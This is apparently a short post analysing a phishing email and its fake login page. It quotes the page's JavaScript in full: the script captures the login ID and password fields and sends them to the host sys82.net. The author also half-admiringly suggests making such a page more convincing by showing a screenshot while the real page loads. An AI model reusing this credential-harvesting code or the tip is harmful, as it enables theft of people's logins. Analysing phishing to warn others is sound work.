Nifty Phishing Approach

*** Scam was stopped ***

This phishing attempt was delivered through email, with the above link - claiming maintenance was scheduled. Has some nice text, doesn’t tell you to login, but provides a link so you can. :)

It looks great.

The code below is the phishing code, it catches the login validation and sends it to the sys82.net server, where it can capture your data.

Code

var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'http://sys82.net/index.php?loh=1&login=' + document.getElementById('loginid').value + '&password=' + document.getElementById('password').value;
document.body.appendChild(script);
return false;

The page content is probably copied live from the real site, with the javascript added in by the phishermen.

Page is slow. Would be good to take a screenshot and use that as a background while the real page loads. :yes: